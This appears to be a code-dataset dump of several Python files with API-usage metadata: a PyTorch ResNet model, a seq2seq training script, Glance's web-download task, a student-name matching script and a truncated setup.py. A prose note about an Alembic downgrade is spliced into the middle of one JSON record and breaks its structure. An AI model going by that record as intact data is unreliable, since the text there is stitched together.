{"api_name": "sqlalchemy.Column", "line_number": 31, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 31, "usage_type": "call"}, {"api_name": "alembic.op.add_column", "line_number": 32, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 32, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 32, "usage_type": "call"}, {"api_name": "sqlalchemy.Float", "line_number": 32, "usage_type": "call"}, {"api_name": "alembic.op.add_column", 
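The downgrade above flips paymentMethod and its siblings back to nullable=False; on a table that has accumulated NULLs in the meantime, that ALTER fails. A common guard is to backfill before tightening. A sketch under assumptions (the 'unknown' default is a placeholder, not part of this migration), intended to run inside downgrade():

from alembic import op
from sqlalchemy.dialects import mysql

# Backfill NULLs first, then reinstate the NOT NULL constraint.
op.execute("UPDATE orders SET paymentMethod = 'unknown' WHERE paymentMethod IS NULL")
op.alter_column('orders', 'paymentMethod',
                existing_type=mysql.VARCHAR(length=20),
                nullable=False)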
"line_number": 33, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 33, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 33, "usage_type": "call"}, {"api_name": "sqlalchemy.Boolean", "line_number": 33, "usage_type": "call"}, {"api_name": "alembic.op.drop_column", "line_number": 39, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 39, "usage_type": "name"}, {"api_name": "alembic.op.drop_column", "line_number": 40, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 40, "usage_type": "name"}, {"api_name": "alembic.op.drop_column", "line_number": 41, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 41, "usage_type": "name"}, {"api_name": "alembic.op.alter_column", "line_number": 42, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 42, "usage_type": "name"}, {"api_name": "sqlalchemy.dialects.mysql.VARCHAR", "line_number": 43, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.mysql", "line_number": 43, "usage_type": "name"}, {"api_name": "alembic.op.alter_column", "line_number": 45, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 45, "usage_type": "name"}, {"api_name": "sqlalchemy.dialects.mysql.VARCHAR", "line_number": 46, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.mysql", "line_number": 46, "usage_type": "name"}, {"api_name": "alembic.op.alter_column", "line_number": 48, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 48, "usage_type": "name"}, {"api_name": "sqlalchemy.dialects.mysql.VARCHAR", "line_number": 49, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.mysql", "line_number": 49, "usage_type": "name"}, {"api_name": "alembic.op.drop_column", "line_number": 51, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 51, "usage_type": "name"}]} +{"seq_id": "23402832", "text": "from config.parameters import *\nimport torch as t\nfrom torch import nn\nimport torch.nn.functional as F\nimport os\nfrom torchvision import models\nfrom torch.nn import init\nimport torch\n\n\ndef weights_init_classifier(m):\n classname = m.__class__.__name__\n if classname.find('Linear') != -1:\n init.normal_(m.weight.data, std=0.001)\n init.constant_(m.bias.data, 0.0)\n\n\ndef conv3x3(in_planes, out_planes, stride=1, groups=1, dilation=1):\n \"\"\"3x3 convolution with padding\"\"\"\n return nn.Conv2d(in_planes,\n out_planes,\n kernel_size=3,\n stride=stride,\n padding=dilation,\n groups=groups,\n bias=False,\n dilation=dilation)\n\n\ndef conv1x1(in_planes, out_planes, stride=1):\n \"\"\"1x1 convolution\"\"\"\n return nn.Conv2d(in_planes,\n out_planes,\n kernel_size=1,\n stride=stride,\n bias=False)\n\n\nclass ResidualBlock(nn.Module):\n def __init__(self, inchannel, outchannel, stride=1):\n super(ResidualBlock, self).__init__()\n self.left = nn.Sequential(\n nn.Conv2d(inchannel,\n outchannel,\n kernel_size=3,\n stride=stride,\n padding=1,\n bias=False),\n nn.BatchNorm2d(outchannel, track_running_stats=True),\n nn.ReLU(inplace=True),\n nn.Conv2d(outchannel,\n outchannel,\n kernel_size=3,\n stride=1,\n padding=1,\n bias=False),\n nn.BatchNorm2d(outchannel, track_running_stats=True))\n self.shortcut = nn.Sequential()\n if stride != 1 or inchannel != outchannel:\n self.shortcut = nn.Sequential(\n nn.Conv2d(inchannel,\n outchannel,\n kernel_size=1,\n stride=stride,\n bias=False),\n nn.BatchNorm2d(outchannel, track_running_stats=True))\n\n def forward(self, x):\n out = self.left(x)\n out += self.shortcut(x)\n out = F.relu(out)\n return 
out\n\n\nclass Bottleneck(nn.Module):\n    def __init__(self, inchannel, outchannel, stride=1):\n        super(Bottleneck, self).__init__()\n        self.bottle = nn.Sequential(\n            nn.Conv2d(inchannel,\n                      outchannel,\n                      kernel_size=1,\n                      stride=1,\n                      padding=0,\n                      bias=False),\n            nn.BatchNorm2d(outchannel, track_running_stats=True),\n            nn.Conv2d(outchannel,\n                      outchannel,\n                      kernel_size=3,\n                      stride=stride,\n                      padding=1,\n                      bias=False),\n            nn.BatchNorm2d(outchannel, track_running_stats=True),\n            nn.Conv2d(outchannel,\n                      outchannel,\n                      kernel_size=1,\n                      stride=1,\n                      padding=0,\n                      bias=False),\n            nn.BatchNorm2d(outchannel, track_running_stats=True),\n            nn.ReLU(inplace=True))\n        self.shortcut = nn.Sequential()\n        if stride != 1 or inchannel != outchannel:\n            self.shortcut = nn.Sequential(\n                nn.Conv2d(inchannel,\n                          outchannel,\n                          kernel_size=1,\n                          stride=stride,\n                          bias=False),\n                nn.BatchNorm2d(outchannel, track_running_stats=True))\n\n    def forward(self, x):\n        out = self.bottle(x)\n        out += self.shortcut(x)\n        out = F.relu(out)\n        return out\n\n\nclass DualResNet(nn.Module):\n    def __init__(self, ResidualBlock, num_classes=62):\n        super(DualResNet, self).__init__()\n        self.inchannel = 64\n        self.conv1 = nn.Sequential(\n            nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=1, bias=False),\n            nn.BatchNorm2d(64, track_running_stats=True),\n            nn.ReLU(),\n        )\n        # https://blog.csdn.net/weixin_43624538/article/details/85049699\n        # part 1: ResidualBlock basic\n        # res18 2 2 2 2\n        # res34 3 4 6 3\n        self.layer1 = self.make_layer(ResidualBlock, 64, 2, stride=1)\n        self.layer2 = self.make_layer(ResidualBlock, 128, 2, stride=2)\n        self.layer3 = self.make_layer(ResidualBlock, 256, 2, stride=2)\n        self.layer4 = self.make_layer(ResidualBlock, 512, 2, stride=2)\n        self.maxpool = nn.AdaptiveMaxPool2d(1)\n        self.avgpool = nn.AdaptiveAvgPool2d(1)\n        self.reduce_layer = nn.Conv2d(1024, 512, 1)\n\n        self.drop = nn.Dropout(0.5)\n        self.fc1 = nn.Linear(512, num_classes)\n        self.fc2 = nn.Linear(512, num_classes)\n        self.fc3 = nn.Linear(512, num_classes)\n        self.fc4 = nn.Linear(512, num_classes)\n\n    def make_layer(self, block, channels, num_blocks, stride):\n        strides = [stride] + [1] * (num_blocks - 1)  # strides=[1,1]\n        layers = []\n        for stride in strides:\n            layers.append(block(self.inchannel, channels, stride))\n            self.inchannel = channels\n        return nn.Sequential(*layers)\n\n    def forward(self, x):\n        bs = x.shape[0]\n        x = self.conv1(x)\n        x = self.layer1(x)\n        x = self.layer2(x)\n        x = self.layer3(x)\n        x = self.layer4(x)\n        x1 = self.maxpool(x)\n        x2 = self.avgpool(x)\n        x = torch.cat([x1, x2], dim=1)\n        x = self.reduce_layer(x).view(bs, -1)\n        x = self.drop(x)\n        y1 = self.fc1(x)\n        y2 = self.fc2(x)\n        y3 = self.fc3(x)\n        y4 = self.fc4(x)\n        return y1, y2, y3, y4\n\n    def save(self, circle):\n        name = \"./weights/DualresNet\" + str(circle) + \".pth\"\n        t.save(self.state_dict(), name)\n        name2 = \"./weights/DualresNet_new.pth\"\n        t.save(self.state_dict(), name2)\n\n    def load_model(self, weight_path):\n        fileList = os.listdir(\"./weights/\")\n        if \"DualresNet_new.pth\" in fileList:\n            name = \"./weights/DualresNet_new.pth\"\n            self.load_state_dict(t.load(name))\n            print(\"the latest model has been loaded\")\n        elif os.path.exists(weight_path):\n            self.load_state_dict(t.load(weight_path))\n            print(\"load %s success!\" % weight_path)\n\n\nclass ClassBlock(nn.Module):\n    def __init__(self,\n                 input_dim,\n                 class_num,\n                 dropout=False,\n                 relu=False,\n                 num_bottleneck=512):\n        super(ClassBlock, self).__init__()\n        add_block = []\n        #add_block += [nn.Linear(input_dim, num_bottleneck)]\n        num_bottleneck = 
input_dim\n add_block += [nn.BatchNorm1d(num_bottleneck)]\n if relu:\n add_block += [nn.LeakyReLU(0.1)]\n if dropout:\n add_block += [nn.Dropout(p=0.5)]\n add_block = nn.Sequential(*add_block)\n add_block.apply(weights_init_kaiming)\n\n classifier = []\n classifier += [nn.Linear(num_bottleneck, class_num)]\n classifier = nn.Sequential(*classifier)\n classifier.apply(weights_init_classifier)\n\n self.add_block = add_block\n self.classifier = classifier\n\n def forward(self, x):\n f = self.add_block(x)\n f_norm = f.norm(p=2, dim=1, keepdim=True) + 1e-8\n f = f.div(f_norm)\n x = self.classifier(f)\n return x\n\n\ndef weights_init_kaiming(m):\n classname = m.__class__.__name__\n # print(classname)\n if classname.find('Conv') != -1:\n init.kaiming_normal(m.weight.data, a=0, mode='fan_in')\n elif classname.find('Linear') != -1:\n init.kaiming_normal(m.weight.data, a=0, mode='fan_out')\n init.constant(m.bias.data, 0.0)\n elif classname.find('BatchNorm1d') != -1:\n init.normal_(m.weight.data, 1.0, 0.02)\n init.constant_(m.bias.data, 0.0)\n", "sub_path": "model/dualpooling.py", "file_name": "dualpooling.py", "file_ext": "py", "file_size_in_byte": 8069, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "torch.nn.init.normal_", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 14, "usage_type": "name"}, {"api_name": "torch.nn.init.constant_", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 15, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 20, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 32, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 39, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 39, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 42, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 43, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 49, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 50, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 50, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 51, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 57, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 58, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 60, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 61, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 61, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 66, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 66, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 71, "usage_type": "call"}, {"api_name": 
"torch.nn.functional", "line_number": 71, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 75, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 75, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 78, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 78, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 79, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 79, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 85, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 85, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 86, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 86, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 92, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 92, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 93, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 93, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 99, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 99, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 100, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 100, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 101, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 101, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 103, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 104, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 104, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 109, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 109, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 114, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 114, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 118, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 118, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 122, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 122, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 123, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 123, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 124, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 124, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 125, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 125, "usage_type": "name"}, {"api_name": "torch.nn.AdaptiveMaxPool2d", "line_number": 135, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 135, "usage_type": "name"}, {"api_name": "torch.nn.AdaptiveAvgPool2d", "line_number": 136, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 136, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 137, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 137, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 139, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 139, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 140, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 140, 
"usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 141, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 141, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 142, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 142, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 143, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 143, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 151, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 151, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 162, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 173, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 175, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 178, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 182, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 184, "usage_type": "call"}, {"api_name": "os.path", "line_number": 184, "usage_type": "attribute"}, {"api_name": "torch.load", "line_number": 185, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 189, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 189, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 200, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 200, "usage_type": "name"}, {"api_name": "torch.nn.LeakyReLU", "line_number": 202, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 202, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 204, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 204, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 205, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 205, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 209, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 209, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 210, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 210, "usage_type": "name"}, {"api_name": "torch.nn.init.kaiming_normal", "line_number": 228, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 228, "usage_type": "name"}, {"api_name": "torch.nn.init.kaiming_normal", "line_number": 230, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 230, "usage_type": "name"}, {"api_name": "torch.nn.init.constant", "line_number": 231, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 231, "usage_type": "name"}, {"api_name": "torch.nn.init.normal_", "line_number": 233, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 233, "usage_type": "name"}, {"api_name": "torch.nn.init.constant_", "line_number": 234, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 234, "usage_type": "name"}]} +{"seq_id": "591061639", "text": "import torch\nimport logging\n\nfrom machine.tasks import get_task\nfrom machine.trainer import SupervisedTrainer\nfrom machine.loss import NLLLoss\nfrom machine.metrics import SequenceAccuracy\n\nfrom data import get_iters\nfrom model import get_baseline_model\n\n\nSEED = 123\ntorch.manual_seed(SEED)\ntorch.cuda.manual_seed(SEED)\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n\ndef init_logging():\n LOG_FORMAT = '%(asctime)s %(name)-12s %(levelname)-8s %(message)s'\n logging.basicConfig(format=LOG_FORMAT, 
level=getattr(\n logging, 'INFO'))\n\n\nNUM_EPOCHS = 10\nHIDDEN_SIZE = 128\ninit_logging()\n\n# Get data\ntrain_iter, valid_iter, test_iters, src, tgt = get_iters()\n\n# Prepare model\nbaseline_seq2seq = get_baseline_model(src, tgt, HIDDEN_SIZE)\nbaseline_seq2seq.to(device)\n\n# Prepare training\npad = tgt.vocab.stoi[tgt.pad_token]\nlosses = [NLLLoss(ignore_index=pad).to(device)]\nmetrics = [SequenceAccuracy(ignore_index=pad)]\ntrainer = SupervisedTrainer(expt_dir='runs/models/baseline')\n\n# Train\nlogging.info(\"Training\")\nseq2seq, logs = trainer.train(baseline_seq2seq, train_iter,\n dev_data=valid_iter,\n monitor_data=test_iters,\n num_epochs=NUM_EPOCHS,\n optimizer='adam',\n checkpoint_path='runs/models/baseline',\n losses=losses, metrics=metrics,\n checkpoint_every=100,\n print_every=100)\n", "sub_path": "baseline.py", "file_name": "baseline.py", "file_ext": "py", "file_size_in_byte": 1538, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "torch.manual_seed", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.cuda.manual_seed", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 15, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 16, "usage_type": "attribute"}, {"api_name": "logging.basicConfig", "line_number": 21, "usage_type": "call"}, {"api_name": "data.get_iters", "line_number": 30, "usage_type": "call"}, {"api_name": "model.get_baseline_model", "line_number": 33, "usage_type": "call"}, {"api_name": "machine.loss.NLLLoss", "line_number": 38, "usage_type": "call"}, {"api_name": "machine.metrics.SequenceAccuracy", "line_number": 39, "usage_type": "call"}, {"api_name": "machine.trainer.SupervisedTrainer", "line_number": 40, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 43, "usage_type": "call"}]} +{"seq_id": "62359904", "text": "# Copyright 2018 Red Hat, Inc.\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom glance_store import backend\nfrom oslo_config import cfg\nfrom oslo_log import log as logging\nfrom taskflow.patterns import linear_flow as lf\nfrom taskflow import task\nfrom taskflow.types import failure\n\nfrom glance.common import exception\nfrom glance.common.scripts import utils as script_utils\nfrom glance.i18n import _, _LE\n\nLOG = logging.getLogger(__name__)\n\nCONF = cfg.CONF\n\n\nclass _WebDownload(task.Task):\n\n default_provides = 'file_uri'\n\n def __init__(self, task_id, task_type, image_repo, image_id, uri):\n self.task_id = task_id\n self.task_type = task_type\n self.image_repo = image_repo\n self.image_id = image_id\n self.uri = uri\n super(_WebDownload, self).__init__(\n name='%s-WebDownload-%s' % (task_type, task_id))\n\n if CONF.node_staging_uri is None:\n msg = (_(\"%(task_id)s of %(task_type)s not configured \"\n \"properly. Missing node_staging_uri: %(work_dir)s\") %\n {'task_id': self.task_id,\n 'task_type': self.task_type,\n 'work_dir': CONF.node_staging_uri})\n raise exception.BadTaskConfiguration(msg)\n\n self.store = self._build_store()\n\n def _build_store(self):\n # NOTE(flaper87): Due to the nice glance_store api (#sarcasm), we're\n # forced to build our own config object, register the required options\n # (and by required I mean *ALL* of them, even the ones we don't want),\n # and create our own store instance by calling a private function.\n # This is certainly unfortunate but it's the best we can do until the\n # glance_store refactor is done. A good thing is that glance_store is\n # under our team's management and it gates on Glance so changes to\n # this API will (should?) break task's tests.\n # TODO(abhishekk): After removal of backend module from glance_store\n # need to change this to use multi_backend module.\n conf = cfg.ConfigOpts()\n try:\n backend.register_opts(conf)\n except cfg.DuplicateOptError:\n pass\n\n conf.set_override('filesystem_store_datadir',\n CONF.node_staging_uri[7:],\n group='glance_store')\n\n # NOTE(flaper87): Do not even try to judge me for this... :(\n # With the glance_store refactor, this code will change, until\n # that happens, we don't have a better option and this is the\n # least worst one, IMHO.\n store = backend._load_store(conf, 'file')\n\n if store is None:\n msg = (_(\"%(task_id)s of %(task_type)s not configured \"\n \"properly. Could not load the filesystem store\") %\n {'task_id': self.task_id, 'task_type': self.task_type})\n raise exception.BadTaskConfiguration(msg)\n\n store.configure()\n return store\n\n def execute(self):\n \"\"\"Create temp file into store and return path to it\n\n :param image_id: Glance Image ID\n \"\"\"\n # NOTE(jokke): We've decided to use staging area for this task as\n # a way to expect users to configure a local store for pre-import\n # works on the image to happen.\n #\n # While using any path should be \"technically\" fine, it's not what\n # we recommend as the best solution. 
For more details on this, please\n # refer to the comment in the `_ImportToStore.execute` method.\n data = script_utils.get_image_data_iter(self.uri)\n\n path = self.store.add(self.image_id, data, 0)[0]\n\n return path\n\n def revert(self, result, **kwargs):\n if isinstance(result, failure.Failure):\n LOG.exception(_LE('Task: %(task_id)s failed to import image '\n '%(image_id)s to the filesystem.'),\n {'task_id': self.task_id,\n 'image_id': self.image_id})\n\n\ndef get_flow(**kwargs):\n \"\"\"Return task flow for web-download.\n\n :param task_id: Task ID.\n :param task_type: Type of the task.\n :param image_repo: Image repository used.\n :param uri: URI the image data is downloaded from.\n \"\"\"\n task_id = kwargs.get('task_id')\n task_type = kwargs.get('task_type')\n image_repo = kwargs.get('image_repo')\n image_id = kwargs.get('image_id')\n uri = kwargs.get('import_req')['method'].get('uri')\n\n return lf.Flow(task_type).add(\n _WebDownload(task_id, task_type, image_repo, image_id, uri),\n )\n", "sub_path": "glance/async_/flows/_internal_plugins/web_download.py", "file_name": "web_download.py", "file_ext": "py", "file_size_in_byte": 5145, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "oslo_log.log.getLogger", "line_number": 27, "usage_type": "call"}, {"api_name": "oslo_log.log", "line_number": 27, "usage_type": "name"}, {"api_name": "oslo_config.cfg.CONF", "line_number": 29, "usage_type": "attribute"}, {"api_name": "oslo_config.cfg", "line_number": 29, "usage_type": "name"}, {"api_name": "taskflow.task.Task", "line_number": 32, "usage_type": "attribute"}, {"api_name": "taskflow.task", "line_number": 32, "usage_type": "name"}, {"api_name": "glance.i18n._", "line_number": 46, "usage_type": "call"}, {"api_name": "glance.common.exception.BadTaskConfiguration", "line_number": 51, "usage_type": "call"}, {"api_name": "glance.common.exception", "line_number": 51, "usage_type": "name"}, {"api_name": "oslo_config.cfg.ConfigOpts", "line_number": 66, "usage_type": "call"}, {"api_name": "oslo_config.cfg", "line_number": 66, "usage_type": "name"}, {"api_name": "glance_store.backend.register_opts", "line_number": 68, "usage_type": "call"}, {"api_name": "glance_store.backend", "line_number": 68, "usage_type": "name"}, {"api_name": "oslo_config.cfg.DuplicateOptError", "line_number": 69, "usage_type": "attribute"}, {"api_name": "oslo_config.cfg", "line_number": 69, "usage_type": "name"}, {"api_name": "glance_store.backend._load_store", "line_number": 80, "usage_type": "call"}, {"api_name": "glance_store.backend", "line_number": 80, "usage_type": "name"}, {"api_name": "glance.i18n._", "line_number": 83, "usage_type": "call"}, {"api_name": "glance.common.exception.BadTaskConfiguration", "line_number": 86, "usage_type": "call"}, {"api_name": "glance.common.exception", "line_number": 86, "usage_type": "name"}, {"api_name": "glance.common.scripts.utils.get_image_data_iter", "line_number": 103, "usage_type": "call"}, {"api_name": "glance.common.scripts.utils", "line_number": 103, "usage_type": "name"}, {"api_name": "taskflow.types.failure.Failure", "line_number": 110, "usage_type": "attribute"}, {"api_name": "taskflow.types.failure", "line_number": 110, "usage_type": "name"}, {"api_name": "glance.i18n._LE", "line_number": 111, "usage_type": "call"}, {"api_name": "taskflow.patterns.linear_flow.Flow", "line_number": 131, "usage_type": "call"}, {"api_name": "taskflow.patterns.linear_flow", "line_number": 131, "usage_type": "name"}]} 
+{"seq_id": "559983998", "text": "#Description: Given a metadata spreadsheet for one semester and a folder with files \n#from that semester, the script looks to see if the names in the filenames match the \n#names in the spreadsheet\n\n#use case: python match_names.py --directory=../../Spring\\ 2019/UTF8_encoded/ --master_file=Spring_2019_test_processed.csv \n\nimport argparse\nimport sys\nimport pandas\nimport os\nimport re\n\nparser = argparse.ArgumentParser(description='Matching names')\nparser.add_argument('--overwrite', action='store_true')\nparser.add_argument('--directory', action=\"store\", dest='dir', default='')\nparser.add_argument('--master_file', action=\"store\", dest='master', default='')\nargs = parser.parse_args()\n\n\nif '.xls' in args.master:\n master_file = pandas.ExcelFile(args.master)\n master_data = pandas.read_excel(master_file)\nelif '.csv' in args.master:\n master_data = pandas.read_csv(args.master)\n\n\n# new data frame with split value columns\nnew = master_data[\"Name\"].str.split(\",\", n = 1, expand = True)\n \n# making separate first name column from new data frame\nmaster_data[\"First Name\"]= new[1]\n \n# making separate last name column from new data frame\nmaster_data[\"Last Name\"]= new[0]\n \n# combine First Name and Last Name\nmaster_data['Name'] = master_data['First Name'].str.cat(master_data['Last Name'],sep=\" \")\n\nlist_of_names = master_data['Name'].values\n#print(list_of_names)\n\nstudent_filenames = []\nstudent_not_found = []\nfor dirpath, dirnames, files in os.walk(args.dir):\n for filename in files:\n found_text_files = False \n if '.txt' in filename:\n found_text_files = True\n filename_parts = filename.split('- ')\n #print(filename_parts)\n student_filename = re.sub(r'\\.txt', r'', filename_parts[1])\n student_filename = re.sub(r'\\s+', r' ', student_filename)\n if student_filename not in student_filenames:\n student_filenames.append(student_filename)\n#print(student_filenames)\n\nfor name in list_of_names:\n if name not in student_filenames:\n if name not in student_not_found:\n student_not_found.append(name)\nprint(\"These student names are in the spreadsheet but NOT in the filenames:\") \nprint('\\n'.join(map(str, student_not_found)))\nprint(\"***************\") \n\nstudent_filenames_not_found = []\nfor student_filename in student_filenames:\n if student_filename not in list_of_names:\n student_filenames_not_found.append(student_filename)\nprint(\"These student names are NOT in the spreadsheet but are in the filenames:\")\nprint('\\n'.join(map(str, student_filenames_not_found)))\n\n\n\n\n\n \n\n\n\n\n", "sub_path": "metadata_processing/archived_scripts/match_names.py", "file_name": "match_names.py", "file_ext": "py", "file_size_in_byte": 2649, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 13, "usage_type": "call"}, {"api_name": "pandas.ExcelFile", "line_number": 21, "usage_type": "call"}, {"api_name": "pandas.read_excel", "line_number": 22, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 24, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 44, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 51, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 52, "usage_type": "call"}]} +{"seq_id": "376985086", "text": "from setuptools import setup\nimport sys\nimport platform\n\nversion='1.1.1'\n\nrequires = 